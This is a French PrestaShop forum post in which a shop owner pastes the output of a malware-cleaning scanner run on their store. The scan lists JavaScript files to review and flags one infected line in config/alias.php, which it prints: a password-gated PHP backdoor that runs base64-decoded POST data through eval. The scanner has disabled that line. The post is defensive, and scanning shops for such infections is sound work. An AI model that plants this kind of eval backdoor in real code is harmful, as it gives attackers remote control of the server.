Jump to content

Edit History

blancmarine06

blancmarine06

Oui depuis la boutique

--------------------------------------------------------------

Script de nettoyage et contrôle pour boutiques PrestaShop by @eolia, version 2.0.16
Ce script est fourni gracieusement et en aucun cas son utilisation ne peut être payante ou facturée

Le répertoire www/**admin**/filemanager a été patché avec succès.

Mémoire OK. Vous avez la dernière version à jour du script -> Démarrage...
Vous pouvez créer une tache cron dans le module cronjobs 1 fois par semaine en appelant https://www.blancmarine.com/be19b1dafbbb.php automatiquement et recevoir le résultat par mail.

Par sécurité l'url du script a été modifiée. Notez la nouvelle url si vous fermez cette page.
Si vous avez oublié l'url, relancez cleaner.php après l'avoir re-téléchargé

Si des messages de nettoyage ou suppression sont affichés en rouge, votre e-boutique est susceptible d'avoir été attaquée et a été protégée d'urgence mais il est nécessaire de restaurer les fichiers modifiés et de changer les mots de passe des employés PrestaShop. Fichiers source introuvables pour cette version: 1.6.1.24. Les contrôles md5 ne pourront être effectués.
 

Contrôle des scripts JS:

Fichier JS à contrôler => www/js/admin-dashboard.jsVoir

Fichier JS à contrôler => www/js/admin-products.jsVoir

Fichier JS à contrôler => www/js/admin-scene-cropping.jsVoir

Fichier JS à contrôler => www/js/admin.jsVoir

Fichier JS à contrôler => www/js/admin/addons.jsVoir

Fichier JS à contrôler => www/js/admin/attachments.jsVoir

Fichier JS à contrôler => www/js/admin/attributes.jsVoir

Fichier JS à contrôler => www/js/admin/carrier_wizard.jsVoir

Fichier JS à contrôler => www/js/admin/dashboard.jsVoir

Fichier JS à contrôler => www/js/admin/email.jsVoir

Fichier JS à contrôler => www/js/admin/import.jsVoir

Fichier JS à contrôler => www/js/admin/login.jsVoir

Fichier JS à contrôler => www/js/admin/modules-position.jsVoir

Fichier JS à contrôler => www/js/admin/notifications.jsVoir

Fichier JS à contrôler => www/js/admin/orders.jsVoir

Fichier JS à contrôler => www/js/admin/price.jsVoir

Fichier JS à contrôler => www/js/admin/products.jsVoir

Fichier JS à contrôler => www/js/admin/scenes.jsVoir

Fichier JS à contrôler => www/js/admin/themes.jsVoir

Fichier JS à contrôler => www/js/adminImport.jsVoir

Fichier JS à contrôler => www/js/admin_carrier_wizard.jsVoir

Fichier JS à contrôler => www/js/admin_order.jsVoir

Fichier JS à contrôler => www/js/cropper/builder.jsVoir

Fichier JS à contrôler => www/js/cropper/cropper.jsVoir

Fichier JS à contrôler => www/js/cropper/dragdrop.jsVoir

Fichier JS à contrôler => www/js/cropper/loader.jsVoir

Fichier JS à contrôler => www/js/cropper/prototype.jsVoir

Fichier JS à contrôler => www/js/cropper/scriptaculous.jsVoir

Fichier JS à contrôler => www/js/fileuploader.jsVoir

Fichier JS à contrôler => www/js/hookLiveEdit.jsVoir

Fichier JS à contrôler => www/js/retro-compat.js.phpVoir

Fichier JS à contrôler => www/js/tools.jsVoir

Fichier JS à contrôler => www/js/validate.jsVoir

Fichier JS à contrôler => www/js/vendor/ladda.jsVoir

 

Contrôle des images pouvant contenir un script:

Pas de fichier image suspect detecté => OK
 

Recherche des infections connues:

MD5 INTEGRITY >>>> Ligne modifiée: if (0) if(md5($_POST['key']) == '04dc8fe3857a967424e144c64c88cada'){eval(base64_decode($_POST['ch']));} => www/config/alias.phpVoir

 

Contrôle de sécurité sur fichiers indésirables connus:

Aucun fichier indésirable connu trouvé
 

Contrôle sur les fichiers sensibles connus pour être modifiés:

Contrôle de defines.inc.php => OK
Contrôle de Dispatcher.php => OK
Contrôle de Hook.php => OK
Contrôle de FrontController.php => OK
Contrôle de Db.php => OK
Contrôle de Module.php => OK
Contrôle de alias.php => OK
Contrôle de config.inc.php => OK
Contrôle de IndexController.php => OK
Contrôle de smarty_internal_templatebase.php => OK
 

Contrôle de sécurité sur les fichiers php coeur:

Contrôle du patch (Injection SQL possible par cache Smarty) sur www/config/smarty.config.inc.php => OK
Votre version Prestashop est inexistante dans les archives md5, le contrôle d'intégrité n'a donc pu être effectué.

Recherche de vulnérabilité sur les modules (à titre d'information, si le module est connu il n'y a à priori pas de risque):

Pas de fonction sensible hors-classe trouvée dans les modules de votre boutique => OK

ANALYSE TERMINÉE

Télécharger l'archive de votre version d'origine Prestashop 1.6.1.24Télécharger l'archive des fichiers à contrôler INFO: Votre version 1.6 possède la version patchée du répertoire www/**admin**/filemanager

EoliaShop ©Relancer le script

Fichiers de taille supérieure à 300Ko exclus de l'analyse pour éviter le crash du script en défaut mémoire (segmentation fault):
- tools/htmlpurifier/HTMLPurifier.standalone.php (662 Ko)
- tools/tcpdf/fonts/cid0cs.php (447 Ko)
- tools/tcpdf/fonts/cid0jp.php (447 Ko)
- tools/tcpdf/fonts/cid0kr.php (447 Ko)
- tools/tcpdf/fonts/uni2cid_ag15.php (372 Ko)
- tools/tcpdf/tcpdf.php (1052 Ko)
- modules/ebay/log/syncError.php (836 Ko)

Si vous pensez que votre serveur peut les analyser, cliquez ci-dessous

-------------------------------------------

×
×
  • Create New...